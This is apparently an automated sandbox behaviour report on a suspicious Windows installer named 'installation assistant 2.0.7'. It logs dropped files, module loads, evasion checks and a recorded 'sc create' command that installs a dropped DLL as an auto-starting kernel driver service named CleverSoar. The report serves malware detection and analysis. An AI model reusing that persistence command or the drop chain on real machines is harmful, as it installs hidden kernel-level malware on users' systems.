Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: apphelp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe | Static file information: File size 8648945 > 1048576
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb | source: 7zr.exe, 0000000C.00000003.2122040104.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2121917091.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00E257D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_00E257D0
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe | Static PE information: real checksum: 0x0 should be: 0x842330
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x34375f
Source: update.vac.1.dr | Static PE information: real checksum: 0x0 should be: 0x378c79
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.5.dr | Static PE information: real checksum: 0x0 should be: 0x34375f
Source: update.vac.6.dr | Static PE information: real checksum: 0x0 should be: 0x378c79
Source: hrsw.vbc.6.dr | Static PE information: real checksum: 0x0 should be: 0x378c79
Source: tProtect.dll.12.dr | Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe | Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.0.dr | Static PE information: section name: .didata
Source: update.vac.1.dr | Static PE information: section name: .00cfg
Source: update.vac.1.dr | Static PE information: section name: .voltbl
Source: update.vac.1.dr | Static PE information: section name: .#.q
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.5.dr | Static PE information: section name: .didata
Source: 7zr.exe.6.dr | Static PE information: section name: .sxdata
Source: hrsw.vbc.6.dr | Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr | Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr | Static PE information: section name: .#.q
Source: update.vac.6.dr | Static PE information: section name: .00cfg
Source: update.vac.6.dr | Static PE information: section name: .voltbl
Source: update.vac.6.dr | Static PE information: section name: .#.q
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C9C8C5B push ecx; ret 6_2_6C9C8C6E
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C870F00 push ss; retn 0001h 6_2_6C870F0A
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6CA96F10 push eax; ret 6_2_6CA96F2E
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C9FB9F4 push 004AC35Ch; ret 6_2_6C9FBA0E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00DA45F4 push 00E4C35Ch; ret 10_2_00DA460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00E3FB10 push eax; ret 10_2_00E3FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00E3FE90 push eax; ret 10_2_00E3FEBE
Source: update.vac.1.dr | Static PE information: section name: .#.q entropy: 7.193027440134885
Source: hrsw.vbc.6.dr | Static PE information: section name: .#.q entropy: 7.193027440134885
Source: update.vac.6.dr | Static PE information: section name: .#.q entropy: 7.193027440134885
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | File created: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | File created: C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | File created: C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | File created: C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\update.vac
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | File created: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe | File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | File created: C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6104
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3549
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Window / User API: threadDelayed 647
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Window / User API: threadDelayed 603
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Window / User API: threadDelayed 561
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
